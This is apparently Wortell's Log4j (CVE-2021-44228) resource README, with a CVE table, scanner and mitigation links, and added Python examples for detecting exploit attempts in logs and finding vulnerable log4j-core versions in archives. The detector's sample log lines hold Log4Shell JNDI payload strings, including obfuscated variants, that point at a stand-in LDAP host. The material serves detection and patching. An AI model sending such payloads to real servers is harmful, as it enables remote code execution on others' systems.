/log4j

Repo containing all info, scripts, etc. related to CVE-2021-44228

CVE-2021-44228 a.k.a. LOG4J

This is a public repository from Wortell containing information, links, files and other items related to the Log4j vulnerabilities.

Due to vulnerabilities in Log4j 2.17.0, it is now recommended to patch to version 2.17.1.

Known CVEs

CVE             Score  Description
CVE-2021-44228  10.0   A remote code execution vulnerability affecting Log4j versions from 2.0-beta9 to 2.14.1 (fixed in version 2.15.0)
CVE-2021-45046  9.0    An information leak and remote code execution vulnerability affecting Log4j versions from 2.0-beta9 to 2.15.0, excluding 2.12.2 (fixed in version 2.16.0)
CVE-2021-45105  7.5    A denial-of-service vulnerability affecting Log4j versions from 2.0-beta9 to 2.16.0 (fixed in version 2.17.0)
CVE-2021-44832  6.6    A remote code execution vulnerability affecting Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4)

(image: log4j-wortell-octo-ninja)

1. Scanning

Here are a few options to find applications that use Log4j and could potentially be abused:

2. Indicators of Compromise

Florian Roth also posted a great YARA rule: https://github.com/Neo23x0/signature-base/blob/master/yara/expl_log4j_cve_2021_44228.yar
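As an added example (not part of this repository and not the code of the YARA rule or the log4shell-detector linked on this page), the following Python script shows what a log-based indicator check has to do: Log4j resolves nested ${lower:...}/${upper:...} lookups, the ${name:-value} default form and URL-encoded input before its JNDI lookup runs, so a detector must normalise each line the same way before matching the literal "${jndi:". The access-log lines, the host name example.invalid and the regular expressions are constructed for this example.

```python
import re
from urllib.parse import unquote

# Constructed example: normalise the lookup forms Log4j resolves before its JNDI
# lookup runs, then match the literal "${jndi:" that remains.
_LOWER_UPPER = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
_DEFAULT_VALUE = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")  # ${name:-x} -> x, including ${::-x}
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalise(line, rounds=5):
    """Strip URL encoding and nested lookups until the text stops changing."""
    text = line
    for _ in range(rounds):
        previous = text
        text = unquote(text)                                   # %24%7B -> ${
        text = _LOWER_UPPER.sub(lambda m: m.group(1), text)    # ${lower:j} -> j
        text = _DEFAULT_VALUE.sub(lambda m: m.group(1), text)  # ${::-j} -> j
        if text == previous:
            break
    return text


def is_exploit_attempt(line):
    """True when the normalised line still contains a JNDI lookup."""
    return _JNDI.search(normalise(line)) is not None


def scan_lines(lines):
    """Return [(line_number, normalised_line)] for lines that look like exploitation attempts."""
    hits = []
    for number, line in enumerate(lines, start=1):
        normalised = normalise(line)
        if _JNDI.search(normalised):
            hits.append((number, normalised))
    return hits


# Constructed access-log lines; example.invalid is a reserved, non-resolving name.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://example.invalid/a}"',
    '10.0.0.7 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://example.invalid/a}"',
    '10.0.0.8 - - [10/Dec/2021:12:00:04 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fexample.invalid%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.9 - - [10/Dec/2021:12:00:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:ldap://example.invalid/a}"',
    '10.0.0.10 - - [10/Dec/2021:12:00:06 +0000] "GET /?q=%7Bjndi%7D HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for number, text in scan_lines(SAMPLE_LOG):
        print(f"line {number}: {text}")
```

Lines 2 to 5 of the sample are reported, each reduced to the same "${jndi:ldap://example.invalid/a}" form; line 6 carries "{jndi}" without the "${" lookup syntax and is correctly ignored. Running the normalisation a bounded number of rounds (rather than until exhaustion) keeps the detector safe against input crafted to keep it looping.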

3. Vulnerable Applications

4. Information

(image: anatomy_log4j)

5. Samples

6. Patches

7. Mitigation Guide

! IMPORTANT ! Exploits are continuously developed. Always make sure to work with the latest version of the scanners. It is verified that the scanners used below take into account that version 2.17.1 of Log4j is recommended.

  1. Identify potentially vulnerable devices by using https://github.com/NCSC-NL/log4shell/blob/main/software/README.md - This is a time-consuming task, but you need to do it anyway, so better start quickly!

  2. Run a scan to check for vulnerable Java applications/dependencies using https://github.com/dtact/divd-2021-00038--log4j-scanner with the command divd-2021-00038--log4j-scanner.exe {target-path} and watch for files that have been classified as vulnerable.

     Version   Classification
     2.12.4    Safe
     2.17.1    Safe
     2.3.2     Safe
     2.16.0    Okay
     2.15.0    Okay
     < 2.15.0  Vulnerable

  3. Run a scan to check for exploit attempts using https://github.com/Neo23x0/log4shell-detector with the command python3 log4shell-detector.py -p c:\ and watch for exploitation attempts.
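As an added example of step 2 (this is not the divd-2021-00038--log4j-scanner code, and not part of this repository), the following Python script walks a directory, opens every JAR/WAR/EAR archive, reads the log4j-core pom.properties that Maven-built jars carry, descends into archives bundled inside archives (WEB-INF/lib and similar), and classifies the version found with the table above. The pom.properties path and the sample archives written by build_fixture are constructed for the example; the treatment of 2.17.0 (Okay, still update) and of versions newer than 2.17.1 (Safe) is an assumption, since the table does not list them.

```python
import io
import os
import re
import tempfile
import zipfile

# Added example, not the scanner linked above: find log4j-core inside JAR/WAR/EAR
# archives (including archives nested in archives) and classify the version.
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")

# Classification table from the mitigation guide. The explicit entries are checked
# before the numeric "< 2.15.0" rule: 2.3.x and 2.12.x are the backport branches for
# older Java releases, so their fixed releases compare below 2.15.0 yet are safe.
SAFE = {(2, 17, 1), (2, 12, 4), (2, 3, 2)}
OKAY = {(2, 16, 0), (2, 15, 0)}


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); pre-releases such as '2.0-beta9' -> (2, 0, 0)."""
    numbers = [int(n) for n in re.findall(r"\d+", text.split("-")[0])][:3]
    return tuple(numbers + [0] * (3 - len(numbers)))


def classify(version):
    """Map a log4j-core version string onto Safe / Okay / Vulnerable."""
    parsed = parse_version(version)
    if parsed in SAFE:
        return "Safe"
    if parsed in OKAY:
        return "Okay"
    if parsed < (2, 15, 0):
        return "Vulnerable"
    # Assumption for versions the table does not list: 2.17.0 still needs the
    # recommended update to 2.17.1; anything at or above 2.17.1 is treated as safe.
    return "Safe" if parsed >= (2, 17, 1) else "Okay"


def log4j_version_in_archive(data):
    """Return the log4j-core version recorded in an archive (bytes), searching nested archives."""
    try:
        archive = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return None
    with archive:
        names = archive.namelist()
        if POM_PROPERTIES in names:
            for line in archive.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    return line.split("=", 1)[1].strip()
        for name in names:  # bundled copies, e.g. WEB-INF/lib/log4j-core-*.jar inside a WAR
            if name.lower().endswith(ARCHIVE_SUFFIXES):
                nested = log4j_version_in_archive(archive.read(name))
                if nested:
                    return nested
    return None


def scan_path(root):
    """Walk root; return sorted [(path, version, classification)] for archives embedding log4j-core."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for filename in filenames:
            if not filename.lower().endswith(ARCHIVE_SUFFIXES):
                continue
            path = os.path.join(dirpath, filename)
            with open(path, "rb") as handle:
                version = log4j_version_in_archive(handle.read())
            if version:
                findings.append((path, version, classify(version)))
    return sorted(findings)


def build_fixture(root):
    """Write constructed sample archives: a plain log4j-core jar and a WAR that bundles one."""
    def jar_bytes(version):
        buffer = io.BytesIO()
        with zipfile.ZipFile(buffer, "w") as jar:
            jar.writestr(POM_PROPERTIES, f"groupId=org.apache.logging.log4j\nversion={version}\n")
        return buffer.getvalue()

    os.makedirs(root, exist_ok=True)
    with open(os.path.join(root, "log4j-core-2.14.1.jar"), "wb") as handle:
        handle.write(jar_bytes("2.14.1"))
    with zipfile.ZipFile(os.path.join(root, "app.war"), "w") as war:
        war.writestr("WEB-INF/lib/log4j-core-2.12.4.jar", jar_bytes("2.12.4"))
    with open(os.path.join(root, "notes.txt"), "w") as handle:
        handle.write("not an archive\n")


def demo():
    """Build the fixture in a temporary directory; return [(file name, version, classification)]."""
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    build_fixture(root)
    return [(os.path.basename(path), version, result) for path, version, result in scan_path(root)]


if __name__ == "__main__":
    for name, version, result in demo():
        print(f"{name}: log4j-core {version} -> {result}")
```

The nested-archive recursion matters in practice: a WAR that bundles log4j-core-2.14.1.jar under WEB-INF/lib is just as vulnerable as the loose jar, but a scan that only matches file names on disk never sees it. Note also that the numeric rule alone would mark 2.12.4 as vulnerable; the explicit Safe entries for the backport branches are what make the classification agree with the table.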

8. Wortell blogs

Here are Wortell specialists blogging about LOG4J:

(image: tvm)

(image: reverse_engineering)